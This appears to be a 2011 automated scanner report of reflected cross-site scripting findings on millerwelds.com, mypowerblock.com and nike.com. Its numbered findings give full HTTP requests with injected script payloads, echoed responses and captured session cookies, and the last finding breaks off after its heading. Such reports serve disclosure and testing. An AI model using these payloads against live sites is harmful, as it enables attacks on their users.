Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:29:54 GMT
Connection: Keep-Alive
Content-Length: 29435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimagesc15db"><a>0a0ab305ada">
...[SNIP]...
4.128. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d5d"><a>5d463450d54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /landingf0d5d"><a>5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 16:43:21 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 29436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonlandingf0d5d"><a>5d463450d54">
...[SNIP]...
4.129. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 391ef"><a>ac7df67acbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pdf391ef"><a>ac7df67acbf/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:00 GMT
Connection: Keep-Alive
Content-Length: 29432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonpdf391ef"><a>ac7df67acbf">
...[SNIP]...
4.130. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99eaa"><a>b06ae5ec7c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products99eaa"><a>b06ae5ec7c1/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:31 GMT
Connection: Keep-Alive
Content-Length: 29437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonproducts99eaa"><a>b06ae5ec7c1">
...[SNIP]...
4.131. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70eb0"><a>8e47a0cc7f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products70eb0"><a>8e47a0cc7f2/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:40 GMT
Connection: Keep-Alive
Content-Length: 29437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonproducts70eb0"><a>8e47a0cc7f2">
...[SNIP]...
4.132. http://www.millerwelds.com/resources/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /resources/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e7a"><a>1f3f3055d71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resourcesc9e7a"><a>1f3f3055d71/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 29438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonresourcesc9e7a"><a>1f3f3055d71">
...[SNIP]...
4.133. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /results/blog/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25505"><a>da77f455929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /results25505"><a>da77f455929/blog/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:10 GMT
Connection: Keep-Alive
Content-Length: 29436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonresults25505"><a>da77f455929">
...[SNIP]...
4.134. http://www.millerwelds.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba2e"><a>f07509a2751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /service7ba2e"><a>f07509a2751/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:04 GMT
Connection: Keep-Alive
Content-Length: 29436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonservice7ba2e"><a>f07509a2751">
...[SNIP]...
4.135. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /wheretobuy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2574"><a>135130b9509 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wheretobuye2574"><a>135130b9509/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:36 GMT
Connection: Keep-Alive
Content-Length: 29439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonwheretobuye2574"><a>135130b9509">
...[SNIP]...
4.136. http://www.mypowerblock.com/xn/loader [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mypowerblock.com
Path:   /xn/loader

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload b5f92<a%20b%3dc>dff4a536d96 was submitted in the r parameter. This input was echoed as b5f92<a b=c>dff4a536d96 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /xn/loader?v=x201104152208_15&r=xg.index.facebookLikeb5f92<a%20b%3dc>dff4a536d96 HTTP/1.1
Host: www.mypowerblock.com
Proxy-Connection: keep-alive
Referer: http://www.mypowerblock.com/video/2170052:Video:1098573
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xn_visitor=b01cb998-4cbc-4662-a142-e71b9376cf7c; 2__utmz=^ning.1318912976229:63740467.1303144976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=63740467.1303144978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmv=^ning.1303145154495:; 2__utma=^ning.1366217154496:63740467.719855752.1303144976.1303144976.1303144976.1; 2__utmc=^ning.1366217154496:63740467; 2__utmb=^ning.1303146954496:63740467.5.10.1303144976; xn_track=rp%252C%25252Fvideo%252Crc%252C0%252Csi%252C1303144978%252Cse%252C1303145878; __utma=63740467.1234973286.1303144978.1303144978.1303144978.1; __utmc=63740467; __utmb=63740467.3.10.1303144978; ning_session=iTSaRuncRVR5LBphZIF02JJ616fPElyof+WqjALrugHZ0uK5zp6VH/JUvAKW6CtAOI7uIbsifps=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:46:43 GMT
Server: Ningtron/2000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=iTSaRuncRVR5LBphZIF02JJ616fPElyof+WqjALrugHZ0uK5zp6VH8hJjqBtPX6yArLbrhjg1bI=;Path=/;Domain=.mypowerblock.com;Expires=Mon, 18-Apr-11 17:46:43 GMT
X-XN-Trace-Token: 9ec960bf-5af6-4ed5-83e6-93aa28166c2a
CACHE-CONTROL: max-age=5184000
Content-Type: text/javascript
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Length: 76

throw 'Could not load module: xg.index.facebookLikeb5f92<a b=c>dff4a536d96';
4.137. http://www.nike.com/nikeos/p/nikegolf/en_US/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/p/nikegolf/en_US/

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E request parameter is copied into the HTML document as plain text between tags. The payload 5e578<script>alert(1)</script>447b06ace9f was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nikeos/p/nikegolf/en_US/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E5e578<script>alert(1)</script>447b06ace9f HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BSESSIONID=03bJt3hl2W-qEya5zX0IgQ**.sin-20-brand-0; s_sv_sid=235127452972; locale=US_US_EN; language=en; country=US; s_cc=true; AKNIKE=3TNLHYd7ObFv9G1bAmHp-8PdP62KjXeAVIxZLf3JzEpQeWx1W2q00hw; dfa_cookie=nikeall%2Cnikeuslanding; s_sq=nikeuslanding%2Cnikeall%3D%2526pid%253Dnikeos%25253Ep%25253Enike%25253Een_US%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.nike.com%25252Findex.jsp%25253Fsitesrc%25253Duslp%252526country%25253DUS%252526lang_locale%25253Den_US%252523l%25253Dshop%25252Corderstatus%2526ot%253DA; ESESSIONID=l1Qbq4TV5LqopuIJXIGYUg**.sin-21-emea-0; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COMMERCE_COUNTRY=US; NIKE_CCR=11|US|US|US|F|||en_US|K|F; geo_tp=vhigh; geo_bw=5000; AnalysisUserId=64.212.60.188.1303153363042556

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: public, must-revalidate, max-age=1800
Expires: Mon, 18 Apr 2011 19:49:03 GMT
Date: Mon, 18 Apr 2011 19:19:03 GMT
Connection: close
Content-Length: 213313

<!-- INCLUDING DATA SSI: "data_templates/generic_seo_data.html" -->
<!-- BEGIN SSI: "../../../global/templates/fragments/seo/seo.html" -->
<!-- END SSI: "../../../global/templates/fragments/seo/seo.
...[SNIP]...
</script>5e578<script>alert(1)</script>447b06ace9f=";
                       console.log(redirect_location);
                       window.location.replace(redirect_location);
                   }
                   else{
                       console.log('no redirect needed');
                   }
               }


       </script>
...[SNIP]...
4.138. http://www.nike.com/nikeos/p/nikegolf/en_US/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/p/nikegolf/en_US/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5c35<script>alert(1)</script>3ee454ba48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nikeos/p/nikegolf/en_US/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E&e5c35<script>alert(1)</script>3ee454ba48d=1 HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BSESSIONID=03bJt3hl2W-qEya5zX0IgQ**.sin-20-brand-0; s_sv_sid=235127452972; locale=US_US_EN; language=en; country=US; s_cc=true; AKNIKE=3TNLHYd7ObFv9G1bAmHp-8PdP62KjXeAVIxZLf3JzEpQeWx1W2q00hw; dfa_cookie=nikeall%2Cnikeuslanding; s_sq=nikeuslanding%2Cnikeall%3D%2526pid%253Dnikeos%25253Ep%25253Enike%25253Een_US%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.nike.com%25252Findex.jsp%25253Fsitesrc%25253Duslp%252526country%25253DUS%252526lang_locale%25253Den_US%252523l%25253Dshop%25252Corderstatus%2526ot%253DA; ESESSIONID=l1Qbq4TV5LqopuIJXIGYUg**.sin-21-emea-0; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COMMERCE_COUNTRY=US; NIKE_CCR=11|US|US|US|F|||en_US|K|F; geo_tp=vhigh; geo_bw=5000; AnalysisUserId=64.212.60.188.1303153363042556

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: public, must-revalidate, max-age=1780
Expires: Mon, 18 Apr 2011 19:49:24 GMT
Date: Mon, 18 Apr 2011 19:19:44 GMT
Connection: close
Content-Length: 213316

<!-- INCLUDING DATA SSI: "data_templates/generic_seo_data.html" -->
<!-- BEGIN SSI: "../../../global/templates/fragments/seo/seo.html" -->
<!-- END SSI: "../../../global/templates/fragments/seo/seo.
...[SNIP]...
</script>=&e5c35<script>alert(1)</script>3ee454ba48d=1";
                       console.log(redirect_location);
                       window.location.replace(redirect_location);
                   }
                   else{
                       console.log('no redirect needed');
                   }
               }


       </script>
...[SNIP]...
4.139. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress [includes parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/p/usnikefootball/lang_LO/utilities/compress

Issue detail

The value of the includes request parameter is copied into a JavaScript inline comment. The payload 86537*/alert(1)//ddfcfbec7af was submitted in the includes parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nikeos/p/usnikefootball/lang_LO/utilities/compress?includes=/sparqtraining/global/modules/sparq/js/helpers.js|/sparqtraining/global/modules/sparq/js/classes/class.ui.js|/sparqtraining/global/modules/sparq/js/survey.js|/sparqtraining/global/js/fbconnect.js|/sparqtraining/global/modules/sparq/js/sparq_functions_global.v2.js86537*/alert(1)//ddfcfbec7af HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nike.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Cache-Control: public, must-revalidate, max-age=3600
Expires: Mon, 18 Apr 2011 20:02:37 GMT
Date: Mon, 18 Apr 2011 19:02:37 GMT
Connection: close
Content-Length: 57611

/* including: /sparqtraining/global/modules/sparq/js/helpers.js */
;var JQ = jQuery.noConflict();
sparq._d = new Date();
sparq.expires = sparq._d*24*60*1000;
(function($) {
$.extend(true, sparq.u
...[SNIP]...
mPublish('', attachment, actionLinks, null, 'What do you think?', self.publishFeedComplete);
}
return self;
}();
;
/* including: /sparqtraining/global/modules/sparq/js/sparq_functions_global.v2.js86537*/alert(1)//ddfcfbec7af */
;
4.140. http://www.nike.com/nsl/services/user/isloggedin [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nsl/services/user/isloggedin

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8d93d<img%20src%3da%20onerror%3dalert(1)>43df17930bb was submitted in the REST URL parameter 4. This input was echoed as 8d93d<img src=a onerror=alert(1)>43df17930bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

